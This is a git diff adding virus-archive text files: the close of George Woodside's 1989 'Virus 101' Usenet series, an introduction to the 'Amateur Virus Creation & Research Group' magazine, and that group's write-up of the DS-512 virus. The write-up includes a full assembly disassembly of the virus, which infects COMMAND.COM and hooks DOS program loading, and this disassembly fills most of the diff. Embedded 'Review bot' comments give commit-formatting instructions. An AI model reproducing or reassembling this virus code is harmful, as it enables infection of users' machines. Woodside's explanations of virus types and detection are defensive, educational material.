+ +Shell - these "wrap themselves around a host program and do not modify the +original program." In laymen's terms, such a virus would tack itself onto a +program file, so it would get loaded with the program. It would have to do +this in a manner that would cause itself to be executed before the host, +since the host certainly would not pass control to the virus. + +This would be quite a complex task on an Atari ST (and on systems with a +similar structure for executable program files). The virus program would +have to be quite large in order to deal with the structure of an executable +file on the ST. In simple terms, an executable file (a program) is a series +of unique sections: a header, the code, data, a relocation map, and +possibly a symbol table. The header specifies the size of each of the +following segments. The code is the program, but in a form which will not +run until it has been relocated. The data is constants, literals, messages, +graphic data, etc. The relocation map tells the ST what changes to make to +the code before it can be run. The symbol table is not usually present, +except during program development. The reason behind this structure is that +when a program is created, it does not know where in memory it will reside +when it is executed. Things like RAMdisks, device drivers, accessories, +printer buffers, spelling checkers, and so on, may or may not be present in +the computer when the program is run. Since each of those things require +memory, the place where the program will wind up being loaded is unknown. +So, when it does get loaded, it has to be told where it is. And, since the +program will almost always contain references to itself (subroutines, +variables, etc.) it has to be modified so that those references point to +the right place. That's what the relocation map is for. It details how the +program has to be modified. Once the program is loaded into memory, and +fixed up, the relocation map and symbol table are discarded. 
So, to hook +into a program file, a virus would have to split the program file, attach +itself to the beginning of the code segment, (that's where execution +begins), re-attach the data, relocation, and (possibly) symbol table +segments, update the relocation map (all the original references would now +have moved), update the header, then re-write itself to the original disk, +assuming there was room on the disk for the (now bigger) file and that the +disk was not write-protected. That's a large amount of work to develop, and +a large amount of code to sneak into a system for the original infection. + +I should mention here that it is not difficult to write "position +independant" code on most micro-processors. You have to set out to do that, +though, and take the necessary steps along the way to keep everything +position independant. Boot sector code is a well known example. The +address where the boot sector will be loaded into memory is unknown, and +there is no relocation done on the code. It has to be position independant. +It also has to fit in the boot sector. If it needs more than the amount of +space in the boot sector, it has to determine its own location, and load +the additional code itself. Of course, that means that it had to have a +place to store the additional code, and it had to know where to find it. +Those items were covered previously. + +Detecting a "Shell" type virus is not difficult. When it attaches itself to +the target program, it must increase the size of the file. While it would +be a real nusiance to check file sizes on a regular basis, there are +programs available to do this for you. An "alteration detection" program +will typically accept a list of programs to recognize. It will write a data +file of its own, noting characteristics of each file in the list, such as +length and date, and then run a numeric algorithm across the file. 
The +numeric algorithm (typically a Cyclic Redundancy Check, or CRC) will yield +a value which is stored in the alteration detection program's own data +file. Then, on each subsequent execution of the alteration detection +program, it checks the recorded characteristics of each file in its list, +and re-executes the algorithm on the files. It reports back any file which +has been changed since it last executed. Needless to mention, such a +program must be run on the files to be monitored before any virus has an +opportunity to attach itself to those files. Then, it must be run frequently +to have a chance to detect altered files. + +(Back to the types of viruses defined in the article)... + +Intrusive - Intrusive viruses work by patching themselves into an existing +program. This type of virus has two possibilities - either it is willing to +render the host program useless, or it will attempt to co-exist with the +host. If it is willing to corrupt the host, this is not too difficult a +task. It would replace a part of the host program, modify the relocation +map, and wait to get run. When it did, it would abandon the original task +of the host program, and launch its attack. An example of this would be the +virus bearing version of a word processor which struck the IBM compatible +market some years ago. It signed on, looking just like a popular shareware +program, but it was busy re-formatting the hard disk while the user waited +for it to load and get ready to accept input. + +The other flavor of intrusive virus, which attempts to co-exist with the +host program, is terribly difficult to create. It has to modify the host in +a manner that either accomplishes the host's task while also doing it's +own, or find a part of the host that is infrequently or no longer used, and +hide there. It would then have to modify some other part of the host in +order to get itself executed. In either case, a virus of this type has to +be aimed at one specific host program. 
There's no way it could perform the +analysis necessary to locate such portions of a randomly selected program. +For that reason, an intrusive virus has to target some program that resides +on a large portion of the target computer's installations, and that it is +certain will be available to tamper with when the virus introduction +occurs. That normally means either the Operating System, or some utility +program so common that it is found virtually every where. + +Operating System viruses work by replacing a portion of the Operating +System with their own code. This is similar to the intrusive type, except +that it can use a new trick (and there are ones that do this on the +IBM/MS-DOS computers). As a part of the operating system, it can sneak out +to a hard disk, find an unused part, mark it as defective, and hide there. +That would mean only a very small part of the code would have to be hooked +into the operating system (possibly as an entry in a list of device +initializing routines). That small segment could then allocate adequate +memory for the real routine, and load it from wherever. + +Source Code viruses - I found this type of virus to be a bit unbelievable. +The article reads (I quote): + +Source code viruses are intrusive programs that are inserted into a source +program such as those written in Pascal prior to the program being +compiled. These are the least-common viruses because they are not only hard +to write, but also have a limited number of hosts compared to other types. +(end quote) + +Sounds to me like this would be nearly impossible to accomplish in +after-market software. If, on the other hand, they mean a part of the +program added by a devious member of a development team, then, it is +credible. It brings to mind the story (which I can't verify, but I've heard +it from enough different sources to believe it is true) about what may well +have been the first virus. 
In case you're not familiar with "C" compilers, +they are usually several different programs, which must be run in proper +sequence, passing files and options from one to the next. Usually, this is +all done by a another program, a "compiler driver", which is almost always +called "cc". You execute "cc", passing it the necessary flags, and the +name(s) of the program(s) you want compiled, and it drives all the +necessary tasks to do it. + +This was reported to have been done by one of the originators of the UNIX +operating system, (name deleted), back in the development days at Bell +Labs. Well, the story goes, he wrote the first versions of UNIX, "C", and +"cc". He had a "back door" to get into a system running UNIX. He built the +back door code into "cc". The code in "cc" checked to see what it was +compiling. If it was the module "login", it incorporated the back door into +the module, so that he could get into the system. If, on the other hand, it +was compiling "cc", it included the code both to re-create itself, and the +code to build the back door into "login". So, every "cc" had the code, and +consequently every UNIX system included the back door. Eventually, it was +discovered, and removed. There followed a frantic rebuilding of every UNIX +system in existance, so the story goes. + +This is the final chapter which will be distributed via cross-posting. +Chapter 4 will relate specifically to viruses captured in the Atari ST +environment, and will be posted only to comp.sys.atari.st. It will come out +about 1 week after this one. This article was posted on March 13, 1989, so you +can determine the approximate delay to your receipt, in case you don't read +that newsgroup, but wish to locate the fourth chapter in comp.sys.atari.st. + +End of Chapter 3. +-- +*George R. 
Woodside - Citicorp/TTI - Santa Monica, CA +*Path: ..!{philabs|csun|psivax}!ttidca!woodside +From: woodside@ttidca.TTI.COM (George Woodside) +Newsgroups: comp.sys.atari.st +Subject: Virus 101: Chapter 4 +Date: 21 Mar 89 13:40:56 GMT + +Having discussed the way viruses work, spread, and can be deterred, the +only remaining topic is how to recognize when an attack occurrs. It is not +always as simple, or as straightforward, as it may seem. What may appear to +be a hardware problem may be a virus, and vice-versa. + +There is no absolute way to determine if a given symptom is being caused by +a program error, a hardware error, a virus, or something else. Not all +viruses cause destructive attacks, but those that do are usually devastating. + +When files start vanishing or becoming unreadable, it may be due to any of +several reasons. Poor media, or abuse of media is not uncommon. A dirty disk +drive head, or one drifting out of alignment can cause previously reliable +disks to start producing errors. In the ST, there is the age old problem of +chip sockets and poor contact, and early versions of the ST had some component +reliability problems which could contribute to disk errors. Another source +becoming more frequent is the use of extended capacity disk formats, some of +which are not entirely reliable. There is also the potential of a real hardware +failure in the ST, or the drive. Finally there is the potential of a virus +attack. How do you tell? It's very difficult. + +Actually, the virus is the easiest to detect. Use your favorite virus detect +program, and start searching. If you can't locate one, then you problem could +be any from the list above. If you find one, you must be certain you have taken +every step available to you to insure it has been eradicated before accessing +your backups. + +When the virus does not destroy files, what does it do? It's rather like +the age old "Where does a 600 pound gorilla sit?". Most anyhere he wants, +obviously. 
A virus can do most anything that any other piece of software can +do. The bigger the code segment of the virus, the more capable it can become. +There are some rather surprising things accomplished by the viruses already +found in boot sectors, when you consider that it has to accomplish its own +loading, spreading, and eventual attack in about 120 instructions. + +Some of the viruses currently spreading do nothing more than mess up the screen +display. When such an event occurs, it is not obvious that it is a virus +attack. It could be a momentary power fluctuation, a software bug of some +kind in the executing application, an intermittent hardware error, or any +of several other causes. The only hope of identifying the source as a virus +is, again, a methodic check of your disk library. + +Familiarity with the appearance of the attacks of known viruses would be +helpful in recognizing when one is present. For that purpose, I have provided +the program "FLU". It is a demonstration program. It does not contain any of +the code present in any virus for the installation of the virus, or the +spreading of the virus. What it does contain is the non-destructive attack +code of several viruses. These attacks are either audio or visual, so that +there is evidence of the attack occurring. There is no simulation of any of +the virus attacks which cause damage to disk data, since there is no way +to recognize when such an attack is occurring (and, of course, the purpose +of the program is to aid in recognizing the symptoms, not to destroy disks!). + +"FLU" is absolutely safe. The program can be viewed as a simple novelty, +which does some strange display alterations. But by running it, and becoming +familiar with the symptoms it displays, you will be capable of recognizing +the characteristics of the attack of several current ST viruses. + +Two of the simulations, the "BLOT" virus and the "SCREEN" virus, attack in +a nearly identical manner. 
They step on a small portion of the screen. When +speeded up to display the symptoms, they have the appearance of drawing lines +from the top and bottom of the screen. However, when the attack occurs at the +speed at which the virus really operates, the attack would appear more like +a small blot appearing on the screen, since the screen would have most likely +been altered or redrawn by the application program between virus attacks. + +The "FREEZE" virus is probably the most difficult of the non-destructive +viruses to recognize, since it is the most subtle. It takes over the +ST for an ever increasing period of time, causing a gradual slowing the +machine. Again, the demonstration runs at a significantly higher speed than +the real virus. + +This concludes the virus discussions. It has been the goal of these postings +to inform the general public of the way viruses spread, attack, and can be +dealt with. It is clear to me that, as a defense, ignorance has been +unsuccessful. + +-- +*George R. Woodside - Citicorp/TTI - Santa Monica, CA +*Path: ..!{philabs|csun|psivax}!ttidca!woodside + \ No newline at end of file diff --git a/textfiles.com/virus/avcr-01.001 b/textfiles.com/virus/avcr-01.001 new file mode 100644 index 00000000..871af5a2 --- /dev/null +++ b/textfiles.com/virus/avcr-01.001 
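Review bot: the Woodside "Virus 101" file is committed without a trailing newline (the hunk closes with `\ No newline at end of file` directly after the signature line `*Path: ..!{philabs|csun|psivax}!ttidca!woodside`), while avcr-01.001 in the same commit ends cleanly; add the newline so the archive is consistent. Leave the body text as captured otherwise: the spellings in the posting ("independant", "nusiance", "existance", "occurrs"), the "(name deleted)" in the compiler back-door anecdote, and the embedded Chapter 4 header block (`From:` / `Newsgroups:` / `Date: 21 Mar 89`) that marks where the second posting begins are the author's own and belong in an archival copy, so they should not be normalised in a later cleanup pass.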
@@ -0,0 +1,52 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + Introduction To Amateur Virus Creation & Research Group & AVCR Magazine + + AVCR has long awaited, and worked hard towards, the release of their +own AVCR Magazine. It all started when The Gallows Pole BBS was put up as +a virus information \ help service for the Illinois area. The BBS was small +at first, which was what I was expecting, and what I wanted, for I was +picturing an individual help basis. But as all BBS do, we grew, and soon +people from other states started to call, eventually people from other +countries had heard of us, so the individualismic attitude could no longer +be kept. I was watching my board become less and less organized, as our +virus collection expanded, and more people were downloading viruses for +research and had no idea what they were doing. It was then that I joined +Amateur Virus Creation & Research group as a host BBS. + A few weeks after my joining the group the president resigned, and +wanted to leave the group to me, since I was running a fairly popular BBS. +I jumped at the opportunity, and soon organized the group around the +"everyone's president" attitude. This turned out to be a total bust, since +nobody was researching, and everyone was dictating. + I soon saw the flaw, and organized the group into positions. We +had a president, which was me (Th Patron), a vice president, which was MAS, +and researching and creating assignments. The group was running very +smoothly, and so we decided that a magazine was our next step. We worked for +months on the format of our magazine, and figured that the index\individual +file format would be the best. So here we are, and our first magazine has +been published, hurray! + Our magazine will hopefully address the new viruses out there, and +the new ideas out there related to the virus field. 
We will include some of +our research results, along with new legislature, and information about the +various virus creation \ information groups out there. We are expecting an +interesting and informative magazine. + diff --git a/textfiles.com/virus/avcr-01.002 b/textfiles.com/virus/avcr-01.002 new file mode 100644 index 00000000..8c34d0a5 --- /dev/null +++ b/textfiles.com/virus/avcr-01.002 
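Review bot: avcr-01.001 opens with a long run of empty lines before the `Distributed By Amateur Virus Creation & Research Group (AVCR)` banner, and nothing in the hunk says whether that padding is the source capture's own layout or an extraction artifact; keep it as captured, but record in the commit message that the padding is original so it is not later stripped as debris. The introduction also carries no date, issue number or author line beyond the in-text handles (Th Patron as president, MAS as vice president); if the issue date is known from the source BBS capture, put it in the commit message or an index file rather than into the text itself.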
@@ -0,0 +1,1087 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + Researched by Th Patron + +Name: The DS-512(New512) Virus +----------------------------------------------------------------------------- +Alias: NEW512 +----------------------------------------------------------------------------- +Type of Code: Non-Memory Resident ; Targets COMMAND.COM \ Boot sector +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported NEW512.COM as: "Infected by DS-512 +virus." +"No checksum / recovery information available." +"The program traps the loading of software. Might be a virus that inter- +cepts program load to infect the software." +"Undocumented interrupt/DOS call. The program might be just trickey +but can also be a virus using a non-standard way to detect itself." +"EXE/COM determination. The program tries to check whether a file is +a COM or EXE file. Viruses need to do this to infect a program." +"Found code that can be used to overwrite/move a program in memory." + +(2) +Frisk Software's F-Protect (F-PROT) reported NEW512.COM as: "contains +unusual code, which is normally only found in viruses." + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) did not detect the DS-512 virus. + +(4) +MicroSoft Anti Virus (MSAV.EXE) did not detect the DS-512 virus. +----------------------------------------------------------------------------- +Execution Results: + When executed the DS-512 sends a beep to your speaker and +displays the text: "This is New 512 Virus .........!!!" The computer's +speed is drastically reduced, due to the hard disk being used WILDLY! +The virus's Checksum is changed from 00DC to 0015. Below are the +disassembled DS-512 virus BEFORE execution and AFTER the computer has +been reset! 
Interestingly, when the computer is reset a third time the +checksum changes back from 0015 to 00DC and so does the virus's code, so +the third(+) time the computer is reset the DS-512 virus's code is the +same as BEFORE execution. +----------------------------------------------------------------------------- +Cleaning Recommendations: + To clean the DS-512 virus we recommend replacing infected files, and +replacing the boot sector (use the SYS command). +----------------------------------------------------------------------------- +Researcher's Notes: + None +----------------------------------------------------------------------------- + Disassembly of the DS-512 Virus BEFORE Execution +----------------------------------------------------------------------------- + PAGE 60,132 + + +data_ff = 0FFh +data_205 = 205h +data_209 = 209h + + +; CODE_SEG_1 + +CODE_SEG_1 segment para public + assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1 + + + org 100h + + +; +; +; ENTRY POINT +; +; + + +; +; +; PROCEDURE proc_start +; +; + +proc_start proc far +start: ; N-Ref=0 + jmp loc_2 + + dw 758Bh, 30h, 0B8h, 0CD4Ch +var1_10b db '!This is New 512 Virus .........!!!' 
+ db 7, 24h, 0B4h, 9, 0BAh, 0Ch + db 1, 0CDh, 21h + db 11 dup (0) +loc_1: ; N-Ref=0 + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr 
[BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte 
Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL +loc_2: ; N-Ref=2 + mov DI,offset var1_100 + mov SI,Word Ptr [DI+5] + add SI,DI + mov CX,7 + push DS + push DI + 
cld ; Clear direction flag + push CX + push SI + repz movsb ; Repeat if ZF = 1, CX > 0 + ; Move byte from DS:SI to ES:DI + xchg CX,AX + pop DI + pop CX + repz stosb ; Repeat if ZF = 1, CX > 0 + ; Store AL at ES:DI + pop DI + push DI + mov CH,8Ch + mov ES,CX + +; + assume ES:nothing +; + + call near ptr proc_1 +proc_start endp + + + +; +; +; PROCEDURE proc_1 +; +; + +proc_1 proc far + pop SI + sub SI,+20h + nop ; 1 Fixup + mov CX,200h + mov DX,132h + push CX + push SI + push ES + push DX + repz movsb ; Repeat if ZF = 1, CX > 0 + ; Move byte from DS:SI to ES:DI + retf ; Return FAR +proc_1 endp + + + + dw 595Fh, 71Eh, 1F0Eh, 0AAF3h + dw 13CDh, 8E06h, 0BFC1h, 4Ch + dw 0ACB8h, 2601h, 587h, 0A8A3h + dw 8C01h, 26C8h, 4587h, 0A302h + dw 1AAh, 19B8h, 2602h, 4587h + dw 0A338h, 215h, 0C88Ch, 8726h + dw 3A45h, 17A3h, 2602h, 5DC5h + dw 8175h, 903Fh, 7590h, 8B05h + dw 85Fh, 1FC5h, 25B9h, offset loc_2 + db 0D9h +loop_loc_3: ; N-Ref=2 + inc BX + cmp Word Ptr [BX],0FC80h + jne loc_4 ; Jump if not equal ( != ) + mov AX,BX +loc_4: ; N-Ref=1 + loop loop_loc_3 ; Loop if CX > 0 + mov DI,1C8h + stosw ; Store AX at ES:DI + mov AX,DS + stosw ; Store AX at ES:DI + mov AH,4Bh ; 'K' + mov DX,2F1h + push CS + pop DS + int 21h ; DOS func ( ah ) = 4Bh + ; EXEC: Load/execute program + ;AL-subfnc DS:DX-ASCIIZ string + ; ES:BX-ptr to cntl block + ;AX-ret code + pop DS + +; + assume DS:nothing +; + + push DS + pop ES + pop DI + push DI + cmp Word Ptr [DI],5A4Dh + jne loc_5 ; Jump if not equal ( != ) + mov AH,4Ch ; 'L' + int 21h ; DOS func ( ah ) = 4Ch + ; Terminate process + ;AL-ret code +loc_5: ; N-Ref=1 + retf ; Return FAR + + dw 0EA9Dh, 5C0h, 0C9E3h, 2E9Ch + dw 3E80h, 0FFh, 7500h, 80F1h + dw 2FCh, 0EC75h, 0FF2Eh, 0A81Eh + dw 9C01h, 0F72h, 1E60h, 0B591h + dw 0E800h, 0Bh, 0C780h, 0E202h + dw 1FF8h, 9D61h, 2CAh, 6000h + dw 1F06h, 7F81h, 8B03h, 7575h + dw 800Eh, 0E93Fh, 0B74h, 0B9h + dw 0C602h, 7, 0E243h, 61FAh + db 0C3h +loc_6: ; N-Ref=0 + mov DI,BX + mov SI,Word Ptr [DI+5] + add SI,DI + mov CL,7 + 
cld ; Clear direction flag + repz movsb ; Repeat if ZF = 1, CX > 0 + ; Move byte from DS:SI to ES:DI + mov CL,7 + dec SI + mov Byte Ptr [SI],CH + loop loc_notfound ; Loop if CX > 0 + + dw 0C361h, 0FDE9h, 8B01h, 3075h + db 0 +loc_7: ; N-Ref=1 + mov Byte Ptr DS:data_ff,0 + pop ES + pop DS + + dw 9D61h, 9EEAh, 2310h, 9C01h + dw 0FC80h, 754Bh, 60F4h, 61Eh + dw 2B8h, 0CD3Dh, 0E72h, 721Fh + dw 0FEE0h, 0FF06h, 9300h, 2B8h + dw 3342h, 33C9h, 0CDD2h, 0B72h + dw 75D2h, 0B82Bh, 4200h, 0C933h + dw 72CDh, 3FB4h, 4B5h, 0BAh + dw 8B03h, 0CDF2h, 3B72h, 75C1h + dw 8115h, 37Ch, 758Bh, 0E74h + db 0FCh, 83h, 0C6h, 7, 0B9h, 0F3h + db 1 +loop_loc_8: ; N-Ref=2 + lodsb ; Load byte at DS:SI to AL + or AL,AL + je loc_9 ; Jump if equal ( = ) + loop loop_loc_8 ; Loop if CX > 0 + jmp short loc_12 +loc_9: ; N-Ref=1 + + dw 0B960h, 6, 0AACh, 75C0h + dw 0E20Dh, 61F9h, 0EE81h, 301h + dw 3689h, 209h, 3EBh, 0EB61h + dw 0BAE3h, 200h +loc_10: ; N-Ref=2 + mov SI,500h + mov CX,200h +loop_loc_11: ; N-Ref=1 + cmp Byte Ptr [SI],DL + jne loc_13 ; Jump if not equal ( != ) + inc SI + loop loop_loc_11 ; Loop if CX > 0 + mov AX,4200h + int 72h + sub AX,3 + mov Word Ptr DS:data_205,AX + mov AH,40h ; '@' + mov CX,200h + inc DH + int 72h + cmp AX,CX + jne loc_14 ; Jump if not equal ( != ) + mov AX,4200h + xor CX,CX + mov DX,Word Ptr DS:data_209 + int 72h + mov AH,40h ; '@' + mov CL,7 + mov DX,offset loc_2 + int 72h + cmp AX,CX + jne loc_14 ; Jump if not equal ( != ) + mov AX,4200h + xor CX,CX + xor DX,DX + int 72h + mov AH,40h ; '@' + mov CL,7 + mov DX,204h + int 72h +loc_12: ; N-Ref=1 + jmp short loc_14 +loc_13: ; N-Ref=1 + add DH,2 + push DX + mov AH,3Fh ; '?' 
+ mov CX,200h + mov DX,500h + int 72h + cmp AX,CX + pop DX + je loc_10 ; Jump if equal ( = ) +loc_14: ; N-Ref=3 + mov AH,3Eh ; '>' + int 72h + jmp loc_7 + +var1_4f1 db '\COMMAND.COM' + db 0 +var1_4fe db 44h, 53h +CODE_SEG_1 ends + + + + end start +----------------------------------------------------------------------------- +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + Disassembly of the DS-512 Virus AFTER It Was Executed +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! +----------------------------------------------------------------------------- + + PAGE 60,132 + + + + +; CODE_SEG_1 + +CODE_SEG_1 segment para public + assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1 + + + org 100h + + +; +; +; ENTRY POINT +; +; + + +; +; +; PROCEDURE proc_start +; +; + +proc_start proc far +start: ; N-Ref=0 + mov AH,9 + mov DX,offset var1_10c + int 21h ; DOS func ( ah ) = 9 + ; Display string + ;DS:DX-output string + mov AX,4C00h + int 21h ; DOS func ( ah ) = 4Ch + ; Terminate process + ;AL-ret code +proc_start endp + + + +var1_10c db 'This is New 512 Virus .........!!!' 
